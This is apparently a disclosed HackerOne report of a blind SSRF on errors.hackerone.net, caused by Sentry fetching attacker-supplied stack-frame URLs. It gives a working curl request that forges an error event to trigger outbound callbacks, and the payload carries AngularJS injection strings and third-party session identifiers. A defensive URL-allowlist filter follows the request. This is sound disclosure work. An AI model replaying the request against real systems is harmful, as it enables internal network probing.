Blind SSRF on errors.hackerone.net due to Sentry misconfiguration
Severity: Low
Program: HackerOne
Reported by chaosbolt
Vulnerability Details
**Summary:**
When setting up Sentry you should turn off "source code scraping". If it is left on, the server running Sentry will make blind GET requests to any URL that an outside party can supply through error reporting.
**Description:**
Hello HackerOne team. In your CSP I found a ?sentry_key parameter, so it is obvious that you are using Sentry to handle CSP reports. The regular route was
```
POST /api/30/csp-report/?sentry_key=61c1e2f50d21487c97a071737701f598
```
However, you can also receive UI bug reports on a different endpoint. Here it is:
```
POST /api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=61c1e2f50d21487c97a071737701f598
```
And here I remembered that if Sentry "source code scraping" is turned on, the server makes a blind GET request to the URL defined in the "filename" parameter, even inside the intranet. So I tried to simulate an error report with a malformed "filename" parameter and got a callback on my website from the IP 54.186.141.19. I am not 100% sure that it is not a firewalled host, but let's try my luck with this report :)
### Steps To Reproduce
1. Replace avtohanter.ru in the following curl command:
```
curl -i -s -k -X $'POST' \
-H $'Host: errors.hackerone.net' -H $'Connection: close' -H $'Content-Length: 9031' -H $'Origin: https://hackerone.com' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' -H $'Content-Type: application/csp-report' -H $'Accept: */*' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' \
--data-binary $'{\"project\":\"30\",\"logger\":\"javascript\",\"platform\":\"javascript\",\"request\":{\"headers\":{\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\"Referer\":\"https://avtohanter.ru/Business/Contractors/ContractorInfo?sessionid=40030075&id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c\"},\"url\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\"},\"exception\":{\"values\":[{\"type\":\"Error\",\"value\":\"Trying to get control scope but angular isn\'t ready yet or something like this\",\"stacktrace\":{\"frames\":[{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":110,\"colno\":81071,\"function\":\"XMLHttpRequest.o\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":75069,\"function\":\"XMLHttpRequest.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":71510,\"function\":\"k\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":23681,\"function\":\"Object.fireWith [as resolveWith]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":22924,\"function\":\"s\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":724721,\"function\":\"Object.n.(anonymous function) [as 
success]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725795,\"function\":\"Object.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":757703,\"function\":\"Object.executeInContext\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725917,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":723970,\"function\":\"c.json.c.toLowerCase.n.success.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\",\"lineno\":2446,\"colno\":299,\"function\":\"ajaxOptions.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":313620,\"function\":\"NotificationCenter.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":316137,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":542056,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":665829,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666057,\"function\":\"NotificationCenterDropdown._scatter\",\"in_app\":true},{\"filename\":\"<anonymous>\",\"lineno\":null,\"colno\":null,\"function\":\"Array.forEach\",\"in_app\":true},{\"filename\":\"https://avtohanter.
ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666079,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":714602,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":713050,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":448313,\"function\":\"NotificationCenterOuterList.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":683081,\"function\":\"NotificationCenterOuterList.getScope\",\"in_app\":true}]}}]},\"transaction\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"trimHeadFrames\":0,\"tags\":{\"AbonentId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"UserId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"OrganizationId\":\"c344ad73-f374-4bef-8629-8ebe1ebea57e\"},\"extra\":{\"session:duration\":357},\"breadcrumbs\":{\"values\":[{\"timestamp\":1530367897.368,\"category\":\"sentry\",\"message\":\"$parse:lexerr: Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\",\"event_id\":\"57575ae92ea2477d8ba3665017601f81\",\"level\":\"error\"},{\"timestamp\":1530367897.373,\"message\":\"Error: [$parse:lexerr] Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\\nhttp://errors.angularjs.org/1.5.8/$parse/lexerr?p0=Unterminated%20quote&p1=s%2047-67%20%5B\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B%5D&p2=\'a\'.constructor.prototype.charAt%3D%5B%5D.join%3B%24eval(\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B\\n at 
https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:365\\n at hr.throwError (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:75995)\\n at hr.readString (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:77352)\\n at hr.lex (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:74150)\\n at vr.ast (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:80676)\\n at Er.compile (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:85908)\\n at Or.parse (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:100573)\\n at c (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:101408)\\n at p (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:63437)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42036\\n at oe (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42291)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40233)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ee (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:39604)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9411\\n at c.$eval (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111066)\\n at c.$apply 
(https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111299)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9371\\n at Object.invoke (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:24205)\\n at o (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9292)\\n at Object.xe [as bootstrap] (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9579)\\n at Object.bootstrap (https://elba.kontur.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js:1:633795)\\n at Function.run (https://elba.kontur.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js:1:38538)\\n at https://elba.kontur.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075:3511:21 undefined\",\"level\":\"error\",\"category\":\"console\"},{\"timestamp\":1530367897.415,\"category\":\"sentry\",\"message\":\"Error: Trying to get control scope but angular isn\'t ready yet or something like this\",\"event_id\":\"2da3183f684d4236b845f3b980c8fabe\",\"level\":\"error\"},{\"timestamp\":1530367897.455,\"category\":\"ui.click\",\"message\":\"input#ContractorRequisitesEdit_ContractorShortName_Input.c-input.c-input_elastic[type=\\\"text\\\"]\"},{\"timestamp\":1530367897.54,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"POST\",\"url\":\"https://elba.kontur.ru/Support/PortalAuth/SetPortalAuthCookie?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075\",\"status_code\":200}},{\"timestamp\":1530367897.577,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"GET\",\"url\":\"https://elba.kontur.ru/Notices/NotificationCenter/GetViewData?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075&_=1530367897217\",\"status_code\":200}}]},\"user\":{\"id\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\"},\"release\":\"mobile_analitcs_redirect_fix e1293c0084a3\",\"event_id\":\"64eaf55f0b6942f6949d0ae00b4e002v\"}' \
$'https://errors.hackerone.net/api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=61c1e2f50d21487c97a071737701f598'
```
2. Catch the GET requests in your access logs.
### How to fix
Turn off "scrape source code" in the Sentry settings.
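The mechanism above (Sentry fetching whatever URL appears in a stack frame's "filename") is what a defender needs to gate. Below is an added example, not Sentry's or the reporter's code, of a pre-filter that reads a raven-js style store payload and only lets frame URLs through source fetching when they are http(s), on an allowlisted origin, and not an IP literal in a non-public range; `ALLOWED_ORIGINS`, `SAMPLE_EVENT` and all its frame URLs are constructed for the example.

```python
"""Pre-filter for Sentry-style error events before any JavaScript source
fetching is allowed. Constructed example; not Sentry's own code."""
import ipaddress
import json
from urllib.parse import urlsplit

# Constructed allowlist: the origins whose scripts this project really serves.
ALLOWED_ORIGINS = {"https://hackerone.com"}


def frame_filenames(event: dict):
    """Yield every stacktrace frame 'filename' in a raven-js store payload."""
    for exc in event.get("exception", {}).get("values", []):
        for frame in exc.get("stacktrace", {}).get("frames", []):
            filename = frame.get("filename")
            if filename:
                yield filename


def is_fetchable(filename: str) -> bool:
    """True only when the frame URL is http(s), on an allowed origin, and its
    host is not an IP literal in a private, loopback or link-local range.
    Hostnames are not resolved here; a real deployment must repeat the IP
    check on the resolved address as well, or DNS can point an allowed-looking
    name at an internal host."""
    parts = urlsplit(filename)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        ip = None  # a DNS name, not an IP literal
    if ip is not None and not ip.is_global:
        return False
    return f"{parts.scheme}://{parts.netloc}" in ALLOWED_ORIGINS


def audit_event(raw: str):
    """Return (fetchable, blocked) frame URLs for one store payload."""
    event = json.loads(raw)
    fetchable, blocked = [], []
    for filename in frame_filenames(event):
        (fetchable if is_fetchable(filename) else blocked).append(filename)
    return fetchable, blocked


# Constructed payload in the shape the report uses: one legitimate frame and
# two frames pointing at hosts Sentry must never fetch from on the sender's say-so.
SAMPLE_EVENT = json.dumps({"exception": {"values": [{"type": "Error", "stacktrace": {"frames": [
    {"filename": "https://hackerone.com/assets/app.js", "lineno": 1},
    {"filename": "https://external-callback.example/cb.js", "lineno": 1},
    {"filename": "http://10.0.0.5/internal.js", "lineno": 1},
]}}]}})

if __name__ == "__main__":
    allowed, denied = audit_event(SAMPLE_EVENT)
    print("fetch allowed:", allowed)
    print("blocked:", denied)
```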
## Impact
Blind SSRF from errors.hackerone.net.
Report Details
State: Closed (Resolved)
Bounty: $3500.00
Weakness: Server-Side Request Forgery (SSRF)